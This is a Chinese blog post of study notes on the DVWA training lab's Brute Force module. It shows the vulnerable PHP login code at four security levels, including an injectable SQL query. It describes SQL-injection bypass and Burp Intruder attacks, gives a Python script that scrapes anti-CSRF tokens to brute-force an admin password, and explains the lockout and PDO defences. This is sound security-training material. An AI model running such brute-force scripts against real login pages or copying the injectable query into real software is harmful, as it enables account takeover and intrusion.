DWVA-1.10学习笔记之一——Brute Force(暴力破解)

最新推荐文章于 2024-03-04 16:48:45 发布
最新推荐文章于 2024-03-04 16:48:45 发布
阅读量419 收藏 1
点赞数 4
分类专栏: 笔记 文章标签: sql php python 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44045328/article/details/107362133
版权

讲在前面

暴力破解本身是一个技术含量比较低的手段,即通过穷举所有有可能的字段进行尝试,找到一个正确的结果,从而达到破解的效果。
我个人觉得,暴力破解的难点在于没有一份强大的字典文件去遍历,其次是遍历的时间一般会比较长,在实战中暴力破解一般会是个最差解。

一、Low

1.1 先看代码:
if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ]; 
    
    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
    
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

这段代码的意思是:

  1. 如果请求包get的内容是login的话,接收username和password两个参数,对password计算md5摘要
  2. 构建sql语句,并发送到数据库进行查询
  3. 解析返回结果

从代码可以看到,服务器端对输入没有任何验证,因此不仅可以暴力破解,直接注入都是行得通的:
在这里插入图片描述
(这里主要是在sql里面and比or的优先级高,所以运算出的结果是true)

1.2 爆破

打开burpsuite,设置代理,然后开始抓包。
用户名输入admin,密码随意,这里输入123456,抓到的包丢进Intruder:
在这里插入图片描述
payload选择simple list,然后开始攻击:
在这里插入图片描述
可以看到,就password的反应包长度不一样,经手工验证,password即为正确的密码。

二、Medium

2.1 代码
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

Medium逻辑上与Low基本一致,不同的是在Medium多了个mysqli_real_escape_string()函数,会对输入的特殊字符进行转义。因此注入的方法是行不通的,但是依旧阻止不了暴力破解,依旧上bp,和Low操作是一样的。
(据说mysqli_real_escape_string()函数有绕过方法)

2.2 破解过程

和Low等级是一样,不浪费篇章重复了。

三、High

3.1 代码
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

顺便抓个包看看
在这里插入图片描述
与其他等级相比,High加入了token机制,这个机制有两个作用,一来防止CSRF攻击,二来由于每个包都会有不同的token值,所以也没办法直接用bp进行爆破,解决办法就是自己写脚本
其次,接收到username和password之后,还在Medium的基础上用了stripslashes()函数来删除反斜杠,进一步防止sql注入。
最后还有一个措施,就是如果登录失败,需要sleep 0~3秒,但是这个措施作用微弱,只能延长暴力破解的时间,并不能从根本上防止暴力破解。

3.2 脚本代码

这里用python3.8

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
@time: 2020-07-15 18:55:20
@author: Mr.Li
Copyright © 2020—2020 Mr.Li. All rights reserved.
"""

import requests
import re

if __name__ == '__main__':
    header = {'Host': '自己的host',
              'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
              'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
              'Accept-Language': 'en-US,en;q=0.5',
              'Accept-Encoding': 'gzip, deflate',
              'Referer': '自己的URL',
              'Connection': 'close',
              'cookie': 'security=high; PHPSESSID=自己的ID',
              'Upgrade-Insecure-Requests': '1'
              }
    with open("password.txt", "r") as f:
        passwords = f.readlines()
    f.close()
    req = requests.get("自己的URL", headers=header)
    token = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", req.text)[0]
    print('NO. username password status_code length')
    i = 0
    for password in passwords:
        password = password.rstrip('\n')
        url = "自己的URL/vulnerabilities/brute/?username=admin&password=" + password + "&Login=Login&user_token=" + token
        req2 = requests.get(url, headers=header)
        token = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", req2.text)[0]
        i = i + 1
        print(i,'admin',password,req2.status_code,len(req2.text))
3.3 运行结果

在这里插入图片描述
爆破成功

四、Impossible

服务器代码:
if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ 'last_login' ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
        */

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow < $timeout ) {
            $account_locked = true;
            // print "The account is locked<br />";
        }
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

相比High等级,Impossible加入了两个可靠的机制:

  1. 登录失败次数限制:每三次登录失败就将账号锁定15分钟,在该机制下,遍历完一份六位纯数字的字典需要接近10年。
  2. PDO(PHP Data Object)机制:PDO可以比较有效防止sql注入,对数据库来讲基本是安全的。但是其实也不是百分之百安全,如果PDO没有正确使用的话还是有可能可以执行注入代码的。另一方面,PDO对JS代码过滤效果一般,存在执行恶意JS代码的可能。

五、本人才疏学浅,若有错误或者其他问题,欢迎评论指出

咸鱼不翻翻翻身
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防以及DWVA-1.9的教程
08-02
2.dvwa---入门级WEB渗透,提供10大领域WEB渗透方法,metasploitable2系统有集成一个低版本的 3.python基础、python黑客编程之道、PHP程序设计基础、PHP代码审计 是以word文档和ppt的形势,无视频
DVWA之暴力破解
编程界菜姬的博客
06-04 615
暴力破解就是利用大量的猜测,将需要的数据一一列举,然后根据条件判断此答案是否合适,合适可保留,不合适需舍弃并测试下一条数据。
代码审计—DWVABrute Force—High
王嘟嘟的博客
11-14 296
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 直接看源码吧。 首先这里是一个token的获取,其实之前一直都在想,都有token了还可以继续爆破吗。回答是可以的,只要这个token,我们也可以获取到,就可以继续爆破了。 我们回到页面,发现这里有一...
【靶场搭建】超级详细——DVWA靶场搭建(婴儿级教程)
KKleeeaa的博客
03-04 1292
首先你得有一个,搭建网站的一个软件,这里我推荐小皮面板,它的安装方式简单,搭建也很容易,对于新手来说是个比较好的一个软件。小皮面板官方网站为,请选择适合你的版本进行安装,我这里给你们演示的是Windows版本的小皮面板。随后点击网站,创建一个新网站,也可以直接用现成的,这里演示创建网站教程。点击刚刚创建好的网站的管理,然后打开跟目录,把DWVA文件解压到这里来。有什么疑难杂症请 截图评论一下 博主会第一时间给你解决哦。他的官方github在这里,中文版的。一键启动 WNMP 蓝色表示启动成功。
代码审计—DWVABrute Force—impossible
王嘟嘟的博客
11-14 340
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 首先是一个token,没问题。 然后是这里,total_failed_login,一看就知道是限制了登录次数,限制登录次数防止爆破,没有问题。 ...
dvwa
qq_30365511的博客
08-03 291
Brute Force low 直接爆破 或者万能密码 admin’ or ‘1’=‘1 admin’# medium 加了一个sleep(2),操作一样,多了个喝茶的时间。万能密码被转义了%df high 有了token验证,理论上要把上次返回的token,修改到这一次token,但脚本我不会 Command Injection low 四种连接 &,&&,|,|| medium 过滤了&&,我们用& high 不知道是不是bug他过滤了“| ”没有过滤
DVWA安装
Chenamao的博客
07-26 196
DVWA 开源的漏洞集成环境。 基于 PHP 语言的,安装到 phpStudy 中即可。 有四种难度级别。 开源免费,可以观察到 Web 应用的源代码。 从攻防两个角度来理解漏洞。 安装: 将DVWA安装文件放到PHP根目录下(C:\phpStudy\WWW) 修改配置文件名 config/config.inc.php.dist 改名成 config/config.inc.php 修改数据库信息 将安全级别选为初级: 开启PHP 物理机访问所在IP地址 M...
DWVA上传漏洞挖掘的测试例1共4页.pdf.zip
11-21
DWVA上传漏洞挖掘的测试例1共4页.pdf.zip
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
新手指南:DVWA 1.9 全级别教程
01-03
新手指南:DVWA 1.9 全级别教程
网络安全(渗透)DVWA靶场安装所需配置
07-10
靶场是必备的,一个好的靶场对学习知识起到了十分重要的作用,DVWA靶场是网络安全或者是渗透中必备的东西,所以必须要购买! 由于开发人员在编写源代码时,没有对源代码中可执行的特殊函数入口做过滤,导致客户端...
DVWA 安装
xufuangchao的博客
05-30 1264
Platform: 4.15.0-kali2-amd64DVWA安装Kali Linux 默认安装了 Apache2, MySQLPHP, 不需要重复安装root@server2:/var/www/html# apachectl -v Server version: Apache/2.4.29 (Debian) Server built: 2018-01-14T11:01:58 roo...
DVWA--FileUpload
weixin_45038413的博客
05-09 440
Low 等级 上传正常图片 https://dvwa.practice.rois.io/vulnerabilities/upload/ + …/…/hackable/uploads/1.jpg =https://dvwa.practice.rois.io/hackable/uploads/1.jpg 上传一句话木马 连接AntSword Medium 等级 上传php文件失败,显示只允...
DVWA简介
热门推荐
live4dream的博客
10-26 4万+
DVWA是一个web安全学习靶场,集成了OWASP Top10的漏洞,用于web安全初学者练习web渗透技巧。
DVWA系列---DVWA搭建
qq_44293117的博客
07-03 2693
一.DWVA简介 DVWA一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入
DWVA靶场-爆破、命令执行、CSRF、文件上传、文件包含、不安全的验证码、SQL注入,七个模块低中高新手练习
m0_46412408的博客
10-06 766
目录模块一 Brute Force(爆破) Security level is currently: Low Security level is currently: mediumSecurity level is currently: highSecurity level is currently: impossible防御措施模块二 Command Injection(命令执行) Security level is currently: Low S
搭建DWVA环境
weixin_45515936的博客
04-01 491
搭建DWVA环境 在这个练习中,我们将配置Damn Vulnerable Web Application (DVWA)。->很脆弱的应用。 这个应用程序有若干基于web的漏洞,比如跨站脚本 (XSS), SQL注入, CSRF,命令注入等。 下面的步骤会帮你安装一个web服务器,并运行应用程序。 1、下载XAMPP 现在并安装XAMPPhttps://www.apachefriends.org/download.html,windowsXP[https://sourceforge.net/proje
dwva靶场 10-14
weixin_74286730的博客
02-14 154
xss
DVWA通关详细教程
来日可期的博客
08-13 6079
DVWA通关详细教程
dwva功能模块改进
最新发布
04-09
DWVA(Distributed Web Vulnerability Assessment)是一种分布式的Web漏洞评估工具,用于检测和评估Web应用程序中的安全漏洞。针对DWVA功能模块的改进,可以从以下几个方面进行优化: 1. 漏洞扫描引擎优化:改进...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值